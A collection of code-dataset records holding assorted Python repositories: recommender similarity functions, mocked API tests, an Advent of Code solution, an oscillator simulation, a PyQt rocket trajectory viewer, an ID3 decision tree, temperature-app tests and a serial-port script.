trainingSet, similarityMeasure, listOfitems, clusterID):\n\n similarityMatrix = getSimilarityMatrixCdist(item, trainingSet, similarityMeasure)\n\n similaritiesForItem = []\n\n for id, sim in zip(listOfitems, similarityMatrix[0]):\n arraySim = [clusterID, id, sim]\n\n similaritiesForItem.append(arraySim)\n\n\n return pd.DataFrame(similaritiesForItem)\n\n\ndef getItemSimilarity(trainingSet, similarityMeasure, originalIDs, itemID):\n item = trainingSet.ix[itemID]\n\n trainingSet = np.array(trainingSet)\n # calculate similarities for training set\n\n xSize, ySize = trainingSet.shape\n\n similaritiesForItems = []\n # for user in trainingSet:\n\n item = np.reshape(item, (-1, ySize))\n similarityMatrix = getSimilarityMatrixCdist(item, trainingSet, similarityMeasure)\n\n for id, sim in zip(originalIDs, similarityMatrix[0]):\n arraySim = [itemID, id, sim]\n\n similaritiesForItems.append(arraySim)\n\n return pd.DataFrame(similaritiesForItems)\n\n\ndef getUserSimilarity(trainingSet, similarityMeasure, originalIDs, userID):\n user = trainingSet.ix[userID]\n\n\n trainingSet = np.array(trainingSet)\n # calculate similarities for training set\n\n xSize, ySize = trainingSet.shape\n\n\n similaritiesForUser = []\n count = 0\n # for user in trainingSet:\n\n user = np.reshape(np.array(user), (-1, ySize))\n similarityMatrix = getSimilarityMatrixCdist(user, trainingSet, similarityMeasure)\n\n for id, sim in zip(originalIDs, similarityMatrix[0]):\n arraySim = [userID, id, sim]\n\n similaritiesForUser.append(arraySim)\n\n return pd.DataFrame(similaritiesForUser)\n","repo_name":"lasigeBioTM/EvalRecSys","sub_path":"evaluateRecSys/getUserSimilarity.py","file_name":"getUserSimilarity.py","file_ext":"py","file_size_in_byte":2953,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"34176386472","text":"# -*- coding: utf-8 -*-\n#\n# This file is part of Kwek Metrics.\n\n\"\"\"Test external API calling mechanism.\"\"\"\n\nimport responses\n\nfrom api.hawkular import query_api\nfrom api.hawkular import get_metric\nfrom api.hawkular import get_os_projects\n\nMETRICS_URL = 'https://metrics-url.com/'\nOS_URL = 'https://os-url.com/'\n\n\ndef test_generic_api_call():\n with responses.RequestsMock() as rsps:\n # Mock\n rsps.add(responses.GET,\n METRICS_URL,\n body='{\"got\": \"this\"}', status=200,\n content_type='application/json')\n # Test\n resp = query_api(METRICS_URL)\n assert resp is not None\n assert resp.json() == {'got': 'this'}\n\n assert len(rsps.calls) == 1\n assert rsps.calls[0].request.url == METRICS_URL\n assert rsps.calls[0].response.text == '{\"got\": \"this\"}'\n\n\ndef test_getting_user_projects(mock_os_api_get_projects):\n \"\"\"Tests getting a response with four projects.\n\n Args:\n mock_os_api_get_projects (mock): mock method for the API Call\n\n \"\"\"\n with responses.RequestsMock(assert_all_requests_are_fired=True) as rsps:\n # Mock\n rsps.add_callback(\n responses.GET,\n OS_URL,\n callback=mock_os_api_get_projects)\n\n # Test\n # This data comes from elsewhere\n url = OS_URL\n auth = 'XXXX'\n resp = get_os_projects(url, auth)\n\n assert len(resp) == 4\n assert resp[0]['metadata']['name'] is not None\n\n\ndef test_get_hawkular_metric_from_namespace(mock_hawkular_api):\n with responses.RequestsMock(assert_all_requests_are_fired=True) as rsps:\n # Mock\n rsps.add_callback(\n responses.GET, METRICS_URL,\n callback=mock_hawkular_api\n )\n\n # Test\n # This data comes from elsewhere..\n metric = 'cpu%2Fusage_rate'\n tenant = '_tenant'\n auth = 'XXXX'\n url = METRICS_URL\n resp = get_metric(url, tenant, auth, metric)\n\n assert resp is not None\n assert len(resp) >= 1\n\n\ndef test_aggregating_metrics():\n \"\"\"Test getting metrics from multiple namespaces and aggregating them\n \"\"\"\n pass\n","repo_name":"jsvgoncalves/kwek-metrics","sub_path":"api/tests/test_api_calls.py","file_name":"test_api_calls.py","file_ext":"py","file_size_in_byte":2181,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"44"} +{"seq_id":"39475242625","text":"from collections import defaultdict\nfrom util import *\nimport re\n\n#File parsing stuff\ndef dataToParsedArray(stringData) :\n\tresult = [] \n\tfor line in stringData.split(\"\\n\"):\n\t\tline = line.strip()\n\t\tif line != \"\":\n\t\t\tresult.append(parse(line))\n\treturn Geology(result)\n\ndef parse(line) :\n\tmapLine = []\n\tfor char in line:\n\t\tif char == \".\":\n\t\t\tmapLine.append(0)\n\t\telif char == \"#\":\n\t\t\tmapLine.append(1)\n\treturn mapLine\n\n#Problem code\n\ndef part1(data):\n\treturn data.countForSlope(3,1)\n\n\ndef part2(data):\n\tmult = 1\n\tfor (x,y) in [(1,1),(3,1),(5,1),(7,1),(1,2)]:\n\t\tmult *= data.countForSlope(x,y)\n\treturn mult\n\nclass Geology:\n\n\tdef __init__(self, geo):\n\t\tself.geo = geo\n\t\tself.height = len(geo)\n\n\tdef isTree(self, x, y):\n\t\trow = self.geo[y]\n\t\tcell = row[x % len(row)]\n\t\treturn cell == 1\n\n\tdef countForSlope(self, slopeX, slopeY):\n\t\tx = 0\n\t\ty = 0\n\t\ttreeCounter = 0\n\t\twhile y < self.height:\n\t\t\tx += slopeX\n\t\t\ty += slopeY\n\t\t\tif y < self.height and self.isTree(x,y):\n\t\t\t\ttreeCounter += 1\n\t\treturn treeCounter\n\n#Execution stuff\n\ndef test1():\n\trawInput = \"..##.......\\n#...#...#..\\n.#....#..#.\\n..#.#...#.#\\n.#...##..#.\\n..#.##.....\\n.#.#.#....#\\n.#........#\\n#.##...#...\\n#...##....#\\n.#..#...#.#\\n\"\n\tdata = dataToParsedArray(rawInput)\n\tprint(part1(data))\n\treturn\n\ndef test2():\n\trawInput = \"..##.......\\n#...#...#..\\n.#....#..#.\\n..#.#...#.#\\n.#...##..#.\\n..#.##.....\\n.#.#.#....#\\n.#........#\\n#.##...#...\\n#...##....#\\n.#..#...#.#\\n\"\n\tdata = dataToParsedArray(rawInput)\n\tprint(part2(data))\n\treturn\n\ndef main():\n\trawInput = open(\"./input/3.txt\").read()\n\tdata = dataToParsedArray(rawInput)\n\tprint(part1(data))\n\tprint(part2(data))\n\treturn\n\n#test1()\n#test2()\nmain()","repo_name":"BNeutral/Advent-of-Code","sub_path":"Advent 2020/3.py","file_name":"3.py","file_ext":"py","file_size_in_byte":1650,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"71047210053","text":"import numpy as np\nfrom scipy.integrate import odeint\nimport matplotlib.pyplot as plt\nimport ray\nimport multiprocessing\n\nray.init(num_cpus=multiprocessing.cpu_count())\n\ndelta = 0.05\nm = 1\nk = 1\nl_0 = 1\na = 0.4\nomega = 1\nphi = np.pi * 0\n\n\ndef dU_dx(U, x):\n # Here U is a vector such that y=U[0] and z=U[1]. This function should return [y', z']\n return [U[1], -1000 * U[1] - 2 * U[0] + 1 * np.cos(2 * x)]\n\n\ndef quad_dU_dx(U, t):\n # Here U is a vector such that y=U[0] and z=U[1]. This function should return [y', z']\n y = U[0]\n z = U[1]\n l = l_0 + a * np.cos(omega * t + phi)\n return [z, - k / m * (1 - (1 / (np.sqrt(1 + ((y * y) / (l * l)))))) * y - delta * z]\n\n\n# y_0 = 1\n# z_0 = 1\n# U0 = [y_0, z_0]\n# xs = np.linspace(0, 500, 10000)\n# Us = odeint(quad_dU_dx, U0, xs)\n# ys = Us[:, 0]\n# phase_map = Us[:, 1]\n#\n# plt.xlabel(\"x\")\n# plt.ylabel(\"y\")\n# plt.title(\"Damped harmonic oscillator\")\n# plt.plot(xs, ys)\n# plt.grid()\n# plt.show()\n#\n# plt.plot(Us[:, 1], ys)\n# plt.grid()\n# plt.show()\n\nlimit = 0.2\nindicate = False\n\n\n@ray.remote\ndef func(y_0):\n inner_result = []\n\n for z_0 in np.linspace(-2, 2, 1000):\n U0 = [y_0, z_0]\n ts = np.linspace(0, 1000, 50)\n Us = odeint(quad_dU_dx, U0, ts)\n xs = Us[:, 0]\n vs = Us[:, 1]\n l_2 = np.sqrt(np.multiply(xs, xs) + np.multiply(vs, vs))\n\n if indicate:\n indicate_list = np.where(l_2 < limit, 1, 0)\n indicator = indicate_list.sum()\n\n if indicator:\n # no oscillation\n inner_result.append([y_0, z_0, 0])\n else:\n # oscillation\n inner_result.append([y_0, z_0, 1])\n else:\n minimum = l_2.min()\n inner_result.append([y_0, z_0, minimum])\n\n return inner_result\n\n\nresult = []\n\nfor y_0 in np.linspace(-2, 2, 1000):\n result.append(func.remote(y_0))\n\nresult = ray.get(result)\n\nresult = np.array(result)\nresult = result.reshape((result.shape[0] * result.shape[1], -1))\n\nplt.scatter(result[:, 0], result[:, 1], c=result[:, 2], s=1)\nplt.colorbar()\nplt.show()\n\n","repo_name":"levopeti/utils","sub_path":"quadratic_oscillator.py","file_name":"quadratic_oscillator.py","file_ext":"py","file_size_in_byte":2091,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"27983855924","text":"import vispy\nfrom vispy import scene\nfrom vispy.scene import visuals\nfrom vispy.scene.visuals import GridLines\nfrom vispy.scene.visuals import XYZAxis\nfrom vispy.scene.visuals import LinePlot\nfrom vispy.color import ColorArray\n\nfrom PyQt5.QtWidgets import QMainWindow, QVBoxLayout, QDialog\nfrom PyQt5.QtWidgets import QPushButton, QSlider, QLabel, QFileDialog, QProgressBar\nfrom PyQt5.QtCore import QTimer\nfrom PyQt5 import uic\n\nfrom scipy.interpolate import interp1d\nimport numpy as np\nimport quaternion\nimport pandas as pd\nimport json\nimport os\n\nTHIS_FILE_DIR = os.path.dirname(os.path.abspath(__file__))\nCONFIG_FILE = os.path.join(THIS_FILE_DIR, 'config.json')\n\nclass MyUi(QMainWindow):\n def __init__(self):\n super(MyUi, self).__init__()\n uic.loadUi('viewer.ui', self)\n\n self.vispy_view = self.findChild(QVBoxLayout, 'vispy_view')\n\n self.pause_btn = self.findChild(QPushButton, 'pause_button')\n self.start_btn = self.findChild(QPushButton, 'start_button')\n self.stop_btn = self.findChild(QPushButton, 'stop_button')\n\n # slider\n self.t_slider = self.findChild(QSlider, 'time_slider')\n # progress bar\n self.progress_bar = self.findChild(QProgressBar, 'progressBar')\n\n # load buttons\n self.load_param_title = self.findChild(QLabel, 'param_load_title')\n self.load_param_btn = self.findChild(QPushButton, 'param_load_button')\n self.load_trajec_title = self.findChild(QLabel, 'trajec_load_title')\n self.load_trajec_btn = self.findChild(QPushButton, 'trajec_load_button')\n self.load_obj_title = self.findChild(QLabel, 'model_load_title')\n self.load_obj_btn = self.findChild(QPushButton, 'model_load_button')\n self.load_evlog_title = self.findChild(QLabel, 'eventlog_load_title')\n self.load_evlog_btn = self.findChild(QPushButton, 'eventlog_load_button')\n self.import_btn = self.findChild(QPushButton, 'load_button')\n\n # status\n self.t_text = self.findChild(QLabel, 't_val')\n self.v_text = self.findChild(QLabel, 'v_val')\n self.v_norm_text = self.findChild(QLabel, 'v_norm_val')\n self.r_text = self.findChild(QLabel, 'r_val')\n self.w_text = self.findChild(QLabel, 'w_val')\n\n def show_file_dialog(self, title='Open File', path='./', ext='*.*'):\n fname = QFileDialog.getOpenFileName(self, title, path, ext)\n return fname[0] # return file path\n\n\nclass RocketMesh:\n def __init__(self, filename, CG_pos=0.0):\n self.CG_pos = np.array([CG_pos, 0.0, 0.0])\n\n self.vertices, self.faces, self.normals, self.texcoords = self._load_obj(filename)\n\n self.visual = visuals.Mesh(self.vertices, self.faces, color='red')\n self.visual.light_dir = [-0.3, -0.3, -1.0]\n # self.visual.ambient_color = 'gray'\n\n # self.pos = np.zeros((3))\n # self.q = np.zeros((4))\n\n def load_model(self, filename):\n self.vertices, self.faces, self.normals, self.texcoords = self._load_obj(filename)\n self.visual.set_data(self.vertices, self.faces, color='red')\n\n def set_scale(self, scale):\n '''\n scale: scale array [sx, sy, sz]\n '''\n self.vertices *= scale\n\n def set_CG_pos(self, pos):\n self.CG_pos = pos\n # self.move(self.pos, self.q)\n \n def set_vertices(self, v):\n self.visual.set_data(v, self.faces, color='red')\n self.visual.light_dir = [-0.3, -0.3, -1.0]\n\n def move(self, pos, q=None): # q: float*4 array of attitude quaternion\n _v = np.copy(self.vertices) + self.CG_pos\n \n if q is not None:\n _q = quaternion.as_quat_array(q)\n attitude = quaternion.as_rotation_matrix(_q)\n\n _v = np.dot(attitude, _v.T).T\n _v += pos\n\n # self.pos = np.copy(pos)\n # self.q = np.copy(q)\n self.visual.set_data(_v, self.faces, color='red')\n self.visual.light_dir = [-0.3, -0.3, -1.0]\n # self.visual.ambient_color = 'gray'\n\n def _load_obj(self, filename):\n v, f, n, t = vispy.io.read_mesh(filename)\n return np.array(v), np.array(f), np.array(n), np.array(t)\n\n\nclass UIHandler:\n def __init__(self, ui:MyUi, canvas, camera, use_pre_rendering=True):\n self.ui = ui\n self.canvas = canvas\n self.camera = camera\n self.ui.vispy_view.addWidget(canvas.native)\n\n self.use_pre_rendering = use_pre_rendering\n\n # member variables initialization\n self._ready = False\n self._slider_dt = 0.01\n self._playback_mode = False\n self._current_t = 0.0\n self._playback_timer = QTimer(self.ui)\n self.obj_file = ''\n self.param_file = ''\n self.trajec_file = ''\n\n self.evlog_file = ''\n self.evlog = {}\n\n # self.rocket_model = RocketMesh('bianca.obj')\n # デフォルトモデルを読み込み\n std_model_path = os.path.join(THIS_FILE_DIR, 'samples/std_scale.obj')\n self.rocket_model = RocketMesh(std_model_path)\n self.rocket_model.set_scale(np.array([1.0, 0.1, 0.1]))\n self.rocket_model.set_CG_pos(np.array([0.5, 0, 0]))\n self.rocket_model.move(np.array([0.0, 0.0, 0.0]))\n\n # set events\n self.ui.load_trajec_btn.clicked.connect(self.load_trajectory)\n self.ui.load_param_btn.clicked.connect(self.load_params)\n self.ui.load_obj_btn.clicked.connect(self.load_obj)\n self.ui.load_evlog_btn.clicked.connect(self.load_eventlog)\n self.ui.import_btn.clicked.connect(self.setup_rendering)\n \n self.ui.start_btn.clicked.connect(self.on_start_clicked)\n self.ui.pause_btn.clicked.connect(self.on_pause_clicked)\n self.ui.stop_btn.clicked.connect(self.on_stop_clicked)\n \n self.ui.t_slider.setMinimum(0)\n self.ui.t_slider.setMaximum(1)\n self.ui.t_slider.setSingleStep(1)\n self.ui.t_slider.valueChanged[int].connect(self.on_slider_changed)\n\n self.trajec_plot_model = None\n # event markers\n self.trajec_event_markers = visuals.Markers()\n self.trajec_event_texts = None\n\n view = self.canvas.central_widget.add_view()\n view.add(GridLines())\n view.add(XYZAxis())\n # view.add(self.trajec_event_markers)\n # view.add(self.trajec_plot_model)\n view.add(self.rocket_model.visual)\n view.bgcolor = 'gray'\n view.camera = self.camera\n view.padding = 12\n self.view = view\n self.canvas.show()\n self.ui.show()\n\n def load_obj(self):\n filename = self.ui.show_file_dialog('ロケット3Dファイルを選択', './', '*.obj')\n if filename == '':\n self.ui.load_obj_title.setText('ロケット3Dモデル(obj)')\n return\n self.ui.load_obj_title.setText(filename)\n self.obj_file = filename\n return filename\n\n def load_trajectory(self):\n filename = self.ui.show_file_dialog('飛行履歴ファイルを選択', './', '*.csv')\n if filename == '':\n self.ui.load_trajec_title.setText('飛翔履歴ファイル(csv)')\n return\n\n self.ui.load_trajec_title.setText(filename)\n self.trajec_file = filename\n return filename\n \n def load_params(self):\n filename = self.ui.show_file_dialog('ロケットパラメータファイルを選択', './', '*.json')\n if filename == '':\n self.ui.load_param_title.setText('パラメータファイル(json)')\n return\n \n self.ui.load_param_title.setText(filename)\n self.param_file = filename\n return filename\n \n def load_eventlog(self):\n filename = self.ui.show_file_dialog('���ベントログファイルを選択', './', '*.json')\n if filename == '':\n self.ui.load_evlog_title.setText('パラメータファイル(json)')\n return\n \n self.ui.load_evlog_title.setText(filename)\n self.evlog_file = filename\n return filename\n\n def plot_events(self):\n n_events = len(self.evlog)\n event_points = np.zeros((n_events, 3))\n event_texts = []\n i = 0\n for name, value in self.evlog.items():\n if not 't' in value:\n continue\n t = value['t']\n r = self.r(t)\n event_points[i] = r\n event_texts.append(name)\n i += 1\n \n self.trajec_event_markers.set_data(event_points, face_color='white', edge_color='yellow', size=10.0)\n\n text_points = event_points + np.array([0.5, 0, 0])\n # if self.trajec_event_texts is not None:\n # self.trajec_event_texts = \n self.trajec_event_texts = visuals.Text(event_texts, color='yellow', font_size=128, pos=text_points)\n self.view.add(self.trajec_event_texts)\n\n def setup_rendering(self):\n # パラメータ,飛翔履歴,3Dモデルを読み込んで描画設定を行う\n try:\n if self.obj_file != '':\n # self.rocket_model = RocketMesh(self.obj_file)\n self.rocket_model.load_model(self.obj_file)\n else:\n # デフォルトモデルを読み込み\n std_model_path = os.path.join(THIS_FILE_DIR, 'samples/std_scale.obj')\n print(' obj file:', std_model_path)\n # self.obj_file = std_model_path\n self.rocket_model.load_model(std_model_path)\n except FileNotFoundError:\n print('obj file was not found.')\n self.ui.load_obj_title.setText('独自ロケットモデル (obj)')\n return\n\n try:\n if self.trajec_file != '':\n df = pd.read_csv(self.trajec_file)\n else:\n print('Trajectory file is not specified.')\n return\n except FileNotFoundError:\n print('Trajectory file: '+self.trajec_file+' was not found.')\n self.ui.load_trajec_title.setText('飛翔履歴ファイル(csv)')\n return\n\n try:\n if self.param_file != '':\n with open(self.param_file) as f:\n self.param = json.load(f)\n else:\n print('Parameter file is not specified.')\n return\n except FileNotFoundError:\n print('Parameter file: '+self.param_file+' was not found.')\n self.ui.load_trajec_title.setText('パラメータファイル(json)')\n return\n\n try:\n if self.evlog_file != '':\n with open(self.evlog_file) as f:\n self.evlog = json.load(f)\n else:\n print('Eventlog file is not specified.')\n return\n except FileNotFoundError:\n print('Eventlog file: '+self.evlog_file+' was not found.')\n self.ui.load_evlog_title.setText('イベントログ・ファイル(json)')\n return\n\n self.trajec_df = df\n # 弾道履歴データを展開\n t = np.array(df['t'])\n self.t = t\n r_array = np.array(df.loc[:, 'x':'z'])\n v_array = np.array(df.loc[:, 'vx':'vz'])\n w_array = np.array(df.loc[:, 'wx':'wz'])\n q_array = np.array(df.loc[:, 'qx':'qw'])\n # 補間\n self.r = interp1d(t, r_array, kind='linear', axis=0, fill_value='extrapolate')\n self.v = interp1d(t, v_array, kind='linear', axis=0, fill_value='extrapolate')\n self.w = interp1d(t, w_array, kind='linear', axis=0, fill_value='extrapolate')\n self.q = interp1d(t, q_array, kind='linear', axis=0, fill_value='extrapolate')\n\n # CG値分モデルを移動\n self.rocket_model.set_CG_pos(np.array([self.param['CG_dry'], 0.0, 0.0]))\n\n # デフォルトのモデルを読み込む場合,モデルをスケーリング\n if self.obj_file == '':\n scale_vec = np.array([self.param['height'], self.param['diameter'], self.param['diameter']])\n self.rocket_model.set_scale(scale_vec)\n\n # ui内容アップデート\n self.ui.t_slider.setMaximum(int(t[-1]/self._slider_dt))\n self.rocket_model.move(self.r(0.0), self.q(0.0))\n\n self.trajec_plot_model = visuals.LinePlot(r_array, color='blue')\n\n self.plot_events()\n\n self.view.add(self.trajec_plot_model)\n self.view.add(self.trajec_event_markers)\n self.view.add(self.trajec_event_texts)\n\n if self.use_pre_rendering:\n self._vertices_buffering()\n else:\n self._ready = True\n\n return\n\n def isReady(self):\n # return self._param_loaded and self._trajec_loaded\n return self._ready\n \n def update_at_t(self, t):\n if not self.isReady():\n return\n\n _v = self.v(t)\n _r = self.r(t)\n _w = self.w(t)\n _q = self.q(t)\n\n self.ui.t_text.setText(str(t))\n self.ui.r_text.setText(f\"{_r[0]:.3f}, {_r[1]:.3f}, {_r[2]:.3f}\")\n self.ui.v_norm_text.setText(f\"{np.linalg.norm(_v):.4f}\")\n self.ui.v_text.setText(f\"{_v[0]:.3f}, {_v[1]:.3f}, {_v[2]:.3f}\")\n self.ui.w_text.setText(f\"{_w[0]:.3f}, {_w[1]:.3f}, {_w[2]:.3f}\")\n\n if self.use_pre_rendering:\n self.rocket_model.set_vertices(self.vertices[int(t/self._slider_dt)])\n else:\n self.rocket_model.move(_r, _q)\n\n self.camera.center = _r\n\n def _playback_update(self):\n if self._current_t >= self.t[-1]:\n self._current_t = 0.0\n\n t = self._current_t\n # sliderにsetValueすると value_changedが呼ばれる\n self.ui.t_slider.setValue(int(t/self._slider_dt))\n self._current_t += self._slider_dt\n\n def on_start_clicked(self):\n if not self.isReady():\n return\n\n self._playback_mode = True\n self._playback_timer.timeout.connect(self._playback_update)\n self._playback_timer.start(10)\n \n def on_pause_clicked(self):\n if not self.isReady():\n return\n \n self._playback_timer.stop()\n self._playback_mode = False\n \n def on_stop_clicked(self):\n if not self.isReady():\n return\n\n self._playback_timer.stop()\n self._current_t = 0.0\n self.update_at_t(0)\n self.ui.t_slider.setValue(0)\n self._playback_mode = False\n\n def on_slider_changed(self, value):\n if not self.isReady():\n return\n\n self._current_t = value*self._slider_dt\n self.update_at_t(self._current_t)\n \n def _vertices_buffering(self):\n t_array = np.arange(0.0, self.t[-1], self._slider_dt)\n vertices_origin = (self.rocket_model.vertices + self.rocket_model.CG_pos).T\n # vertices_origin: (3, n_vertices), vertices: (n_time, n_vertices, 3)\n vertices = np.zeros((len(t_array), vertices_origin.shape[1], vertices_origin.shape[0]))\n print(' vertices buffering ')\n print(' origin vertices shape:', vertices_origin.shape)\n print(' total vertices shape: ', vertices.shape)\n\n i = 0\n lim = len(t_array)\n\n timer = QTimer(self.ui)\n def _calc_vertices():\n nonlocal i\n t = t_array[i]\n _q = quaternion.as_quat_array(self.q(t))\n Tdc = quaternion.as_rotation_matrix(_q)\n pos = self.r(t)\n\n vertices[i] = np.dot(Tdc, vertices_origin).T + pos\n i += 1\n\n self.ui.progress_bar.setValue(int(i/lim * 100))\n if i >= len(t_array):\n timer.stop()\n self._ready = True\n\n timer.timeout.connect(_calc_vertices)\n timer.start()\n self.vertices = vertices\n\n\nif __name__ == '__main__':\n # load config params\n try:\n with open(CONFIG_FILE) as f:\n config = json.load(f)\n except FileNotFoundError:\n print('config file not found.')\n config = {\n 'pre_rendering': True\n }\n\n vispy.use('pyqt5')\n canvas = scene.SceneCanvas(keys=\"interactive\", size=(1200, 800), show=False)\n camera = scene.TurntableCamera(up='+z')\n\n myui = MyUi()\n\n handler = UIHandler(myui, canvas, camera, use_pre_rendering=config['pre_rendering'])\n\n canvas.app.run()","repo_name":"PLANET-Q/TrajecViewer","sub_path":"trajec_viewer.py","file_name":"trajec_viewer.py","file_ext":"py","file_size_in_byte":16225,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"4294704316","text":"from math import log\nimport collections\n\n\ndef createDataSet():\n dataSet = [[0, 0, 0, 0, 'no'], \n [0, 0, 0, 1, 'no'],\n [0, 1, 0, 1, 'yes'],\n [0, 1, 1, 0, 'yes'],\n [0, 0, 0, 0, 'no'],\n [1, 0, 0, 0, 'no'],\n [1, 0, 0, 1, 'no'],\n [1, 1, 1, 1, 'yes'],\n [1, 0, 1, 2, 'yes'],\n [1, 0, 1, 2, 'yes'],\n [2, 0, 1, 2, 'yes'],\n [2, 0, 1, 1, 'yes'],\n [2, 1, 0, 1, 'yes'],\n [2, 1, 0, 2, 'yes'],\n [2, 0, 0, 0, 'no']]\n charas = ['年龄', '有工作', '有自己的房子', '信贷情况']\n return dataSet, charas\n\ndef calLabelProbability(dataSet:list):\n '''计算一个子集中各label的概率'''\n data_size = len(dataSet)\n labels = [data[-1] for data in dataSet]\n count = {}\n P = {}\n for label in labels:\n if label in count:\n count[label] += 1\n else:\n count[label] = 1\n for label in count:\n P[label] = float(count[label] / data_size)\n return P\n\ndef calCharaProbability(dataSet:list, index:int):\n '''计算一个子集中根据某chara的概率'''\n data_size = len(dataSet)\n count = collections.Counter([data[index] for data in dataSet])\n \n P = {}\n for key in count:\n P[key] = float(count[key] / data_size)\n \n return P\n\ndef calEntropy(dataSet:list):\n '''计算H, H=-Σpi*logpi'''\n P = calLabelProbability(dataSet)\n entropy = 0\n \n for label in P:\n entropy -= P[label] * log(P[label], 2)\n\n return entropy\n\ndef calInformationGain(dataSet:list, index:int):\n '''计算信息增益g=H(D)-H(D|A)'''\n empirical_entropy = calEntropy(dataSet=dataSet)\n empirical_conditional_entropy = 0\n P = calCharaProbability(dataSet, index)\n for key in P:\n childSet = []\n for data in dataSet:\n if data[index] == key:\n childSet.append(data)\n empirical_conditional_entropy += P[key] * calEntropy(childSet)\n return empirical_entropy - empirical_conditional_entropy\n\ndef chooseBestChara(dataSet:list, charas:list):\n\n charas_size = len(charas)\n G = []\n for i in range(charas_size):\n G.append(calInformationGain(dataSet, i))\n print(\"chara \" + str(i) + \" \" + str(calInformationGain(dataSet, i)))\n best_chara_index = G.index(max(G))\n return best_chara_index\n\ndef splitDataSet(dataSet:list, index:int, value:int):\n\n retDataSet = [] \n for featVec in dataSet: \n if featVec[index] == value:\n reducedFeatVec = featVec[:index] \n reducedFeatVec.extend(featVec[index+1:]) \n retDataSet.append(reducedFeatVec)\n return retDataSet\n\ndef generateTree(dataSet:list, charas:list, bestCharas:list):\n\n data_size = len(dataSet)\n labels = [data[-1] for data in dataSet]\n labels_count = collections.Counter(labels)\n labels_count_sorted = sorted(labels_count.items(), key=lambda d:d[1], reverse = True)\n if len(labels_count) == 1: # 即该(子)数据集中只有一类\n return labels[0]\n if len(dataSet[0]) == 1: # 即该(子)数据集中特征为空\n return labels_count_sorted.values()[0]\n best_chara_index = chooseBestChara(dataSet, charas)\n best_chara = charas[best_chara_index]\n bestCharas.append(best_chara)\n tree = {best_chara:{}}\n del(charas[best_chara_index])\n chara_values = [data[best_chara_index] for data in dataSet]\n unique_vals = set(chara_values)\n for val in unique_vals:\n charas_sub = charas[:]\n tree[best_chara][val] = generateTree(splitDataSet(dataSet, best_chara_index, val), charas_sub, bestCharas)\n return tree\n\nif __name__ == \"__main__\":\n\n dataSet, charas = createDataSet()\n best_charas = []\n print(generateTree(dataSet, charas, best_charas))","repo_name":"b-bad/Machine-Learning","sub_path":"decision tree/ID3.py","file_name":"ID3.py","file_ext":"py","file_size_in_byte":3961,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"74664287173","text":"import unittest\nfrom datetime import datetime\nimport requests\nimport project\nfrom project import CityTemperature\n\nclass TestProgram(unittest.TestCase):\n # Рандомні дані для тестів\n data = [\n CityTemperature(\"Харків\", 20, datetime.now().replace(microsecond=0)),\n CityTemperature(\"Київ\", 17, datetime.now().replace(microsecond=0)),\n CityTemperature(\"Львів\", 18, datetime.now().replace(microsecond=0)),\n CityTemperature(\"Одеса\", 15, datetime.now().replace(microsecond=0))\n ]\n \n # Щоб дані правильно зберігалися і завантажувалися\n def test_saving_and_loading_from_file(self):\n project.save(self.data)\n self.assertEqual(self.data, project.load())\n \n # Повинно бути Одеса\n def test_smallest(self):\n self.assertEqual(self.data[3], project.smallest(self.data))\n \n # Повинно бути Харків\n def test_biggest(self):\n self.assertEqual(self.data[0], project.biggest(self.data))\n \n # Порівняння з вбудованим алгоритмом sorted()\n def test_sort(self):\n sorted_data_copy = sorted(self.data.copy(), key=lambda city: city.temperature)\n project.sort(self.data)\n self.assertEqual(sorted_data_copy, self.data)\n \n # Всі статус-коди http-запитів повинні бути 200 (ОК)\n def test_city_names_validity(self):\n with open(\"token.txt\", \"r\") as file:\n token = file.read()\n statuses = []\n with requests.Session() as session:\n for eng_name in project.name_mappings.values():\n response = session.get(f\"https://api.openweathermap.org/data/2.5/weather?q={eng_name}&appid={token}\")\n statuses.append(response.status_code)\n self.assertEqual(statuses, [200 for _ in range(25)])\n ","repo_name":"altersaber0/ukrainian-cities-air-temperatures","sub_path":"tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":1931,"program_lang":"python","lang":"uk","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"18314984311","text":"\nimport threading\nimport serial \nimport time\n\nglobal incomingByte\n#mutex = threading.Lock()\n\ndef create_porta():\n global portaUSB\n aux = '/dev/ttyACM0'\n try:\n portaUSB = serial.Serial(aux, 9600, timeout=1)\n except:\n print('conexao nao estabelecida')\n\ndef chave():\n global incomingByte\n #i = 0\n while(1):\n #mutex.acquire()\n incomingByte = portaUSB.read().rstrip().decode('CP1252')\n #print(incomingByte)\n #i = i + 1\n #mutex.release()\n\ndef sen_command(cod):\n aux = str(cod)\n portaUSB.write(aux.encode())\n\ndef comandoFarois():\n\n global incomingByte\n print('TESTE')\n #mutex.acquire()\n if(incomingByte == 'F'):\n sen_command('ligar farois')\n print('LIGA FAROIS')\n else:\n sen_command('desligar farois')\n print('DESLIGA FAROIS')\n #mutex.release()\n\n\n# CRIAÇÃO DAS THREADS\nTchave = threading.Thread(target=chave)\nligafarois = threading.Thread(target=comandoFarois)\n\n# CHAMADAS DE FUNÇÕES\ncreate_porta()\n\n# INICIANDO AS THREADS\nTchave.start()\nligafarois.start()\n\nwhile Tchave.isAlive():\n print(\"Thread da chave esta funcionando\")\n time.sleep(5)\n","repo_name":"iigorpaiva/painel","sub_path":"painel.py","file_name":"painel.py","file_ext":"py","file_size_in_byte":1165,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"20186621924","text":"import pickle\nimport numpy as np\nimport pandas as pd\n\nfrom components.data_balancing import Balancing\nfrom components.data_cleaning import Cleaning\nfrom components.explainability import Explainability\nfrom components.feature_scaling import Scaling\nfrom components.feature_selection import Selection\nfrom components.metrics import Metrics\nfrom components.classification import Classification\nfrom components.setup import Setup\nfrom components.validation import Validation\n\n\nclass Dispatcher:\n\n def __init__(self, data, path, to_predict, path_training):\n self.data = data\n self.dir_path = path\n self.dataset_to_predict = to_predict\n self.path_training = path_training\n\n def start(self):\n # Data setup\n data = Setup().data_setup(self.path_training, training=True)\n\n # Data Cleaning\n 